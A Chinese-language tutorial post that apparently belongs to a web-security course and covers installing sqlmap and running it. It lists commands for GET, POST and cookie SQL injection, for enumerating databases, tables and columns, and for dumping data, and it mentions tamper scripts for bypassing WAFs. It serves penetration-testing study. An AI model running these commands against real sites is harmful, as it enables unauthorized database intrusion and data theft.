您的位置: 首页  >  文章  >  小迪教程第八天——注入工具sqlmap的使用

小迪教程第八天——注入工具sqlmap的使用

分类: 文章 2022-10-03 21:16:52

1、安装过程

1)安装python2.7

2)在python2.7的目录中解压sqlmap
小迪教程第八天——注入工具sqlmap的使用

3)在桌面建立快捷方式
小迪教程第八天——注入工具sqlmap的使用

2、使用方法

1)get类型注入

Sqlmap.py -u 注入地址
检测指定站点注入情况,默认会以get类型注入检测

小迪教程第八天——注入工具sqlmap的使用
2)post类型注入

小迪教程第八天——注入工具sqlmap的使用

3)cookie类型注入

Sqlmap.py -u 注入地址 –cookie “参数” –level 2
以cookie注入提交检测网站

小迪教程第八天——注入工具sqlmap的使用
4)获取表信息
列表名: Sqlmap.py -u 注入地址 –tables

小迪教程第八天——注入工具sqlmap的使用

5)列指定表名下的列名

Sqlmap.py -u 注入地址 –columns -T 表名

小迪教程第八天——注入工具sqlmap的使用

6)取指定表名列名下的数据

Sqlmap.py -u 注入地址 –dump -C “列名” -T 表名

小迪教程第八天——注入工具sqlmap的使用

小迪教程第八天——注入工具sqlmap的使用

7)其他使用
Sqlmap.py -u 注入地址 检测指定站点注入情况
默认会以get类型注入检测

Sqlmap.py -u 注入地址 –data “参数”
以post注入提交检测网站

Sqlmap.py -u 注入地址 –cookie “参数” –level 2
以cookie注入提交检测网站

Sqlmap.py -u 注入地址 –dbs 列数据库

Sqlmap.py -u 注入地址 –current-db 当前数据库名

Sqlmap.py -u 注入地址 –tables 列表名

Sqlmap.py -u 注入地址 –columns -T 表名 列指定表名下的列名

Sqlmap.py -u 注入地址 –dump -C “列名” -T 表名 获取指定表名下的列名的数据

3、高级技能

使用sqlmap中的其他插件,如使用tamper脚本绕过waf注入

4、其他内容

asp语言
Request 全部接受
Request.querystring get传递
Request.form post传递
Request.cookie cookie传递

php语言
REQUEST_GET
POST_COOKIE
$_SERVER

相关推荐